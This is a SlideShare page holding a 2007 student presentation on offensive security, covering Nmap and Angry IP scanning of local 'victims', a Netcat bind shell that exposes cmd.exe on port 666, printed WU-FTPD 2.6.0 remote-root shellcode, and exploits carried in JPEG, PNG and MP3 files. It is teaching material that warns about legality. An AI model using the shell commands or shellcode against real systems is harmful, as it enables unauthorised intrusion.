SlideShare a Scribd company logo

Security & ethical hacking p2

Download as PPT, PDF
R
ratnalajaggu

The document provides an overview of ethical hacking techniques such as advanced scanning with NMAP to identify open ports and operating systems on remote systems. It discusses how tools like Nmap and Angry IP Scanner can be used to scan locally and remotely, and how information gathered can be used to potentially exploit systems. Example exploits discussed include using Netcat to create remote shells and payloads embedded in files like JPEG and MP3 files. The document emphasizes that while the information is presented, actually hacking systems without permission would be illegal.

Technology
1 of 29
Downloaded 66 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Security & “Ethical” Hacking Luke Arntson Central Washington University Winter 2007 Presentation #2 – Advanced Scanning & Exploitation
Introduction Again “ Ethical ” hacking Do you Sniff before you taste? Patience, persistence, some other motivational p word… Have phun, getting frustrated is normal
About Me
Overview Advanced scanning with NMAP (as seen in the Matrix) Local IP Sweeping & its importance Netcat rooting, a simple shell Identify Station ( operating system ) Brief Exploit talk & Shell code Exploits via Jpgs, Pngs, Mp3s, etc. Conclusion
Advanced Scanning (NMAP) Ok, we have acquired an IP (or range of) and we want to find out some information about this system . We will use a very popular program named Nmap . Almost every Linux install its packaged, Windows you will need to download Nmap and the Win-Pcap files.
Advanced Scanning (NMAP) Lets look at some of the information techniques provided by nmap SCAN TECHNIQUES : -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan We will be using another scan technique to probe open ports and determine service/versions in use: -sV
Advanced Scanning (NMAP) So lets run a -sV scan along with -v for verbose and -O for OS detection
Advanced Scanning (NMAP) So lots of gibberish, but we can sort through this for VERY important details! First: we have all of the open ports , along with what versions they are running! Port 139.. Very interesting. Second: we also found out the operating system ! Windows 98 SE… that will be later.
Protection from NMAP Keep those firewalls up if you’re not a server and you’re not hosting. There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques. It is scary how much information can be acquired about you by a simple sniff and run.
Local IP Sweeping The LAN is the weakest network generally Open ports , open boxes , free IPs , easy sweeps Vast majority of people feel other computers within the LAN are not hackers , but compromise a wireless router & bam…
Using Angry IP Scanner Again! Angry IP Scanner ; Its script kiddie, but it works very well, and is faster than NMAP Lets grab our local IP on the network, and begin our scan , so we are currently 192.168.5.100, and we know our range is 192.168.5.* Use Angry IP Scanner just to find available peers on the network, this is VERY useful for a compromised wireless router or compromised system on a router
We Have Local Victims! Okay, we have local victims, we can now use Nmap on each victim. Nmap will also bypass firewalls given enough time with the –P0 option. Once we know operating systems , open ports , we can use online security search tools such as www.securityfocus.com and locate exploits !
Importance of Local Sweeps Compromised routers = compromised systems, vulnerable on the inside only. Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping Viruses often spread within a network (commercial, government, etc.) using LAN sweeps
Netcat Rooting (Simple Shell) Ok, we want to see what kind of access a shell really has on a system. Shell referring to a command prompt window on another computer. Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell. A windows version is free to download, Linux generally comes with NC in the shell already.
Client/Server Determine which computer you want to have a shell on, and put nc.exe somewhere on there. Next run nc.exe with the following parameters: nc.exe –l –p 666 –e “cmd.exe” This will execute Netcat to listen on port 666, and when connected , it will execute and send the output of cmd.exe on the server.
Client Connection Client now connects to the server using the corresponding line: nc.exe 192.168.77.2 666 And Viola! Netcat shell over the network.
Why Netcat Root? A nice way to make your first root , easy to expand on this. Potential is HUGE when the –e “???” command is used. Netcat is open source , so you can venture the source code to understand how exactly Netcat does this. This also works in Unix, just replace cmd.exe with a Unix shell ;)
Identify Station Continuation of Nmap OS discovery Once we have found a target, what kind of operating system is it running? Nmap -O command will usually show you, unless the computer has a firewall on.
Importance of OS ID Exploiting and choice of exploits/roots is always dependent on the type of OS Do we want to look for likely exploits , find a more aggressive approach, or leave it. For example, Linux servers often have a SSH server open, we can either nmap –sV and exploit, or try to bruteforce. Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)
Brief Exploits & Shell Code Exploits come in all sorts of languages & sizes . Some are simple run once on an IP, others have various options and offsets . Exploits are used as a way of getting into a system, shell code is what happens AFTER the exploit is successful . Shell code will always vary with experienced hackers, as they will always have useful shells on hand.
Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT char linuxcode[]= /* Lam3rZ chroot() code */ &quot;\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb&quot; &quot;\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31&quot; &quot;\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27&quot; &quot;\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31&quot; &quot;\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d&quot; &quot;\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46&quot; &quot;\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8&quot; &quot;\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c&quot; &quot;\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0&quot; &quot;\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff&quot; &quot;\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31&quot;; This is machine code , used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system. This is public knowledge, just type the following in Google: wuftpd exploit filetype:c
More on Shells Later Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation. Shells are scary to look at because if you do not know the machine code or the system its intended for, there is absolutely no way to know what its doing, but it can compromise a system!
Exploits via Jpg, Pngs, Mp3s Exploits come in many varieties , as it just takes a stray string call or a bad size check to make a program vulnerable. All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!
GDI+ Jpg vulnerability Posted on Sept. 30, 2004 “ In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing. “ – Mark Joseph Edwards http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1
Exploits via Jpg, Pngs, Mp3s Other vulnerabilities in the form of Pngs and Mp3s have come into the wild. One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded. A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.
Just because its media… Just because you’re viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer. Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.
Resources If this type of information interests you, there are many safe online resources. www.hackthissite.org - a friendly playground for web hackers www.phrack.org - a very good place for random articles with great pieces of info www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits.
Conclusion Again, I emphasize just because I’m showing you this, does NOT make it legal. In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about. Remember, finding exploits that work is tedious, not everything you find online works every time . Setup a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun , it takes work so don’t give up!
Thank You For Your Time! Feel free to email me any questions/comments at [email_address]

More Related Content

PPT
Security & ethical hacking
Amanpreet Singh
 
PDF
Placing backdoors-through-firewalls
Akapo Damilola
 
PPTX
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
PPT
Dynamic Port Scanning
amiable_indian
 
PPT
Attacking Automatic Wireless Network Selection
amiable_indian
 
PDF
Hardening Three - IDS/IPS Technologies
Salvatore Lentini
 
PDF
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
Security & ethical hacking
Amanpreet Singh
 
Placing backdoors-through-firewalls
Akapo Damilola
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
Dynamic Port Scanning
amiable_indian
 
Attacking Automatic Wireless Network Selection
amiable_indian
 
Hardening Three - IDS/IPS Technologies
Salvatore Lentini
 
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 

What's hot (20)

PPT
Dynamic Port Scanning
amiable_indian
 
PDF
Nmap Basics
amiable_indian
 
PDF
Predicting and Abusing WPA2/802.11 Group Keys
vanhoefm
 
PPT
Port scanning
Hemanth Pasumarthi
 
PPT
Anton Chuvakin on Honeypots
Anton Chuvakin
 
PDF
Ceh v8 labs module 08 sniffers
Mehrdad Jingoism
 
PPTX
Recon with Nmap
OWASP Delhi
 
PDF
Nmap for Scriptors
n|u - The Open Security Community
 
PPTX
ShinoBOT Suite
Shota Shinogi
 
PDF
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
PDF
Nmap
Fat-Thing Gabriel-Culley
 
PPTX
Hacking with Remote Admin Tools (RAT)
Zoltan Balazs
 
PDF
NMAP by Shrikant Antre & Shobhit Gautam
n|u - The Open Security Community
 
PDF
IDS & Passive Network Defense
Salvatore Lentini
 
PDF
Aircrack
Nithin Sathees
 
DOCX
Certified Ethical Hacker quick test prep cheat sheet
David Sweigert
 
PPT
Operating System Fingerprinting Prevention
dcalhoun1984
 
PPTX
NMap
Pritesh Raka
 
DOCX
Step by Step on How to Setup DarkComet
Pich Pra Tna
 
PDF
Ceh v8 labs module 07 viruses and worms
Asep Sopyan
 
Dynamic Port Scanning
amiable_indian
 
Nmap Basics
amiable_indian
 
Predicting and Abusing WPA2/802.11 Group Keys
vanhoefm
 
Port scanning
Hemanth Pasumarthi
 
Anton Chuvakin on Honeypots
Anton Chuvakin
 
Ceh v8 labs module 08 sniffers
Mehrdad Jingoism
 
Recon with Nmap
OWASP Delhi
 
Nmap for Scriptors
n|u - The Open Security Community
 
ShinoBOT Suite
Shota Shinogi
 
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
Nmap
Fat-Thing Gabriel-Culley
 
Hacking with Remote Admin Tools (RAT)
Zoltan Balazs
 
NMAP by Shrikant Antre & Shobhit Gautam
n|u - The Open Security Community
 
IDS & Passive Network Defense
Salvatore Lentini
 
Aircrack
Nithin Sathees
 
Certified Ethical Hacker quick test prep cheat sheet
David Sweigert
 
Operating System Fingerprinting Prevention
dcalhoun1984
 
NMap
Pritesh Raka
 
Step by Step on How to Setup DarkComet
Pich Pra Tna
 
Ceh v8 labs module 07 viruses and worms
Asep Sopyan
 

Viewers also liked (20)

PPTX
ethical hacking in the modern times
jeshin jose
 
PPTX
Ethical hacking ppt
Vallapureddy Sravani
 
PPTX
ethical hacking
Neelima Bawa
 
PDF
IT Trends - Cyber Security
Datix Consulting
 
PPT
Hackers
guesta04f59b
 
PPT
Ethical hacking a licence to hack
Dharmesh Makwana
 
PPTX
How to hack or what is ethical hacking
baabtra.com - No. 1 supplier of quality freshers
 
PPTX
Hacker toolkit
Prachi Gupta
 
PPT
HTML
Sweta Leena Panda
 
PDF
Georgia Tech Hack Day
Christian Heilmann
 
PDF
How to avoid facebook scams
Mr.OoPpSs Group
 
PPTX
HACKING
Shubham Agrawal
 
PPTX
Advice for Computer Science freshers!
Karan Singh
 
PPT
Port Scanning
amiable_indian
 
PPTX
Introduction to ethical hacking
Agung Suwandaru
 
PPT
Efim Obreja, Legal Expert, Transparency International – Moldova - Political f...
IDIS Viitorul
 
PPT
Hacking
Purohit Rock
 
PPT
Ethical hacking
kawsarahmedchoudhuryzzz
 
PPTX
Ethical hacking - Good Aspect of Hacking
Divy Singh Rathore
 
PPTX
Cybercrime (Computer Hacking)
Esteban
 
ethical hacking in the modern times
jeshin jose
 
Ethical hacking ppt
Vallapureddy Sravani
 
ethical hacking
Neelima Bawa
 
IT Trends - Cyber Security
Datix Consulting
 
Hackers
guesta04f59b
 
Ethical hacking a licence to hack
Dharmesh Makwana
 
How to hack or what is ethical hacking
baabtra.com - No. 1 supplier of quality freshers
 
Hacker toolkit
Prachi Gupta
 
HTML
Sweta Leena Panda
 
Georgia Tech Hack Day
Christian Heilmann
 
How to avoid facebook scams
Mr.OoPpSs Group
 
HACKING
Shubham Agrawal
 
Advice for Computer Science freshers!
Karan Singh
 
Port Scanning
amiable_indian
 
Introduction to ethical hacking
Agung Suwandaru
 
Efim Obreja, Legal Expert, Transparency International – Moldova - Political f...
IDIS Viitorul
 
Hacking
Purohit Rock
 
Ethical hacking
kawsarahmedchoudhuryzzz
 
Ethical hacking - Good Aspect of Hacking
Divy Singh Rathore
 
Cybercrime (Computer Hacking)
Esteban
 

Similar to Security & ethical hacking p2 (20)

PDF
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
PPT
Hacking
rameswara reddy venkat
 
PPT
Hacking
Roshan Chaudhary
 
PPTX
BackTrack5 - Linux
mariuszantal
 
DOCX
Security Handbook
Anthony Hasse
 
PDF
OS Fingerprinting
Rashmika Nawaratne
 
PPT
Hacking tutorial
MSA Technosoft
 
PDF
Derevolutionizing OS Fingerprinting: The cat and mouse game
Jaime Sánchez
 
PDF
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
PDF
Penetrating Windows 8 with syringe utility
IOSR Journals
 
PDF
bettercap.pdf
shehbaz15
 
PPT
Hacking In Detail
Greater Noida Institute Of Technology
 
PDF
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
PPT
aaa
hungnhatban
 
PPT
Sectools
securedome
 
PPT
Freeware Security Tools You Need
amiable_indian
 
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
PPTX
G3t R00t at IUT
Nahidul Kibria
 
PPTX
Final project.ppt
shreyng
 
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Hacking
rameswara reddy venkat
 
Hacking
Roshan Chaudhary
 
BackTrack5 - Linux
mariuszantal
 
Security Handbook
Anthony Hasse
 
OS Fingerprinting
Rashmika Nawaratne
 
Hacking tutorial
MSA Technosoft
 
Derevolutionizing OS Fingerprinting: The cat and mouse game
Jaime Sánchez
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
Penetrating Windows 8 with syringe utility
IOSR Journals
 
bettercap.pdf
shehbaz15
 
Hacking In Detail
Greater Noida Institute Of Technology
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
aaa
hungnhatban
 
Sectools
securedome
 
Freeware Security Tools You Need
amiable_indian
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
G3t R00t at IUT
Nahidul Kibria
 
Final project.ppt
shreyng
 

Recently uploaded (20)

PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Modernizing your data center with Dell and AMD
Principled Technologies
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Encapsulation theory and applications.pdf
gurumoop
 
Modernizing your data center with Dell and AMD
Principled Technologies
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Teaching material agriculture food technology
LiaRayya
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 

Security & ethical hacking p2

  • 1. Security & “Ethical” Hacking Luke Arntson Central Washington University Winter 2007 Presentation #2 – Advanced Scanning & Exploitation
  • 2. Introduction Again “ Ethical ” hacking Do you Sniff before you taste? Patience, persistence, some other motivational p word… Have phun, getting frustrated is normal
  • 4. Overview Advanced scanning with NMAP (as seen in the Matrix) Local IP Sweeping & its importance Netcat rooting, a simple shell Identify Station ( operating system ) Brief Exploit talk & Shell code Exploits via Jpgs, Pngs, Mp3s, etc. Conclusion
  • 5. Advanced Scanning (NMAP) Ok, we have acquired an IP (or range of) and we want to find out some information about this system . We will use a very popular program named Nmap . Almost every Linux install its packaged, Windows you will need to download Nmap and the Win-Pcap files.
  • 6. Advanced Scanning (NMAP) Lets look at some of the information techniques provided by nmap SCAN TECHNIQUES : -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan We will be using another scan technique to probe open ports and determine service/versions in use: -sV
  • 7. Advanced Scanning (NMAP) So lets run a -sV scan along with -v for verbose and -O for OS detection
  • 8. Advanced Scanning (NMAP) So lots of gibberish, but we can sort through this for VERY important details! First: we have all of the open ports , along with what versions they are running! Port 139.. Very interesting. Second: we also found out the operating system ! Windows 98 SE… that will be later.
  • 9. Protection from NMAP Keep those firewalls up if you’re not a server and you’re not hosting. There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques. It is scary how much information can be acquired about you by a simple sniff and run.
  • 10. Local IP Sweeping The LAN is the weakest network generally Open ports , open boxes , free IPs , easy sweeps Vast majority of people feel other computers within the LAN are not hackers , but compromise a wireless router & bam…
  • 11. Using Angry IP Scanner Again! Angry IP Scanner ; Its script kiddie, but it works very well, and is faster than NMAP Lets grab our local IP on the network, and begin our scan , so we are currently 192.168.5.100, and we know our range is 192.168.5.* Use Angry IP Scanner just to find available peers on the network, this is VERY useful for a compromised wireless router or compromised system on a router
  • 12. We Have Local Victims! Okay, we have local victims, we can now use Nmap on each victim. Nmap will also bypass firewalls given enough time with the –P0 option. Once we know operating systems , open ports , we can use online security search tools such as www.securityfocus.com and locate exploits !
  • 13. Importance of Local Sweeps Compromised routers = compromised systems, vulnerable on the inside only. Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping Viruses often spread within a network (commercial, government, etc.) using LAN sweeps
  • 14. Netcat Rooting (Simple Shell) Ok, we want to see what kind of access a shell really has on a system. Shell referring to a command prompt window on another computer. Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell. A windows version is free to download, Linux generally comes with NC in the shell already.
  • 15. Client/Server Determine which computer you want to have a shell on, and put nc.exe somewhere on there. Next run nc.exe with the following parameters: nc.exe –l –p 666 –e “cmd.exe” This will execute Netcat to listen on port 666, and when connected , it will execute and send the output of cmd.exe on the server.
  • 16. Client Connection Client now connects to the server using the corresponding line: nc.exe 192.168.77.2 666 And Viola! Netcat shell over the network.
  • 17. Why Netcat Root? A nice way to make your first root , easy to expand on this. Potential is HUGE when the –e “???” command is used. Netcat is open source , so you can venture the source code to understand how exactly Netcat does this. This also works in Unix, just replace cmd.exe with a Unix shell ;)
  • 18. Identify Station Continuation of Nmap OS discovery Once we have found a target, what kind of operating system is it running? Nmap -O command will usually show you, unless the computer has a firewall on.
  • 19. Importance of OS ID Exploiting and choice of exploits/roots is always dependent on the type of OS Do we want to look for likely exploits , find a more aggressive approach, or leave it. For example, Linux servers often have a SSH server open, we can either nmap –sV and exploit, or try to bruteforce. Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)
  • 20. Brief Exploits & Shell Code Exploits come in all sorts of languages & sizes . Some are simple run once on an IP, others have various options and offsets . Exploits are used as a way of getting into a system, shell code is what happens AFTER the exploit is successful . Shell code will always vary with experienced hackers, as they will always have useful shells on hand.
  • 21. Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT char linuxcode[]= /* Lam3rZ chroot() code */ &quot;\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb&quot; &quot;\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31&quot; &quot;\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27&quot; &quot;\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31&quot; &quot;\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d&quot; &quot;\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46&quot; &quot;\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8&quot; &quot;\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c&quot; &quot;\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0&quot; &quot;\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff&quot; &quot;\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31&quot;; This is machine code , used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system. This is public knowledge, just type the following in Google: wuftpd exploit filetype:c
  • 22. More on Shells Later Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation. Shells are scary to look at because if you do not know the machine code or the system its intended for, there is absolutely no way to know what its doing, but it can compromise a system!
  • 23. Exploits via Jpg, Pngs, Mp3s Exploits come in many varieties , as it just takes a stray string call or a bad size check to make a program vulnerable. All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!
  • 24. GDI+ Jpg vulnerability Posted on Sept. 30, 2004 “ In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing. “ – Mark Joseph Edwards http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1
  • 25. Exploits via Jpg, Pngs, Mp3s Other vulnerabilities in the form of Pngs and Mp3s have come into the wild. One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded. A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.
  • 26. Just because its media… Just because you’re viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer. Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.
  • 27. Resources If this type of information interests you, there are many safe online resources. www.hackthissite.org - a friendly playground for web hackers www.phrack.org - a very good place for random articles with great pieces of info www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits.
  • 28. Conclusion Again, I emphasize just because I’m showing you this, does NOT make it legal. In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about. Remember, finding exploits that work is tedious, not everything you find online works every time . Setup a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun , it takes work so don’t give up!
  • 29. Thank You For Your Time! Feel free to email me any questions/comments at [email_address]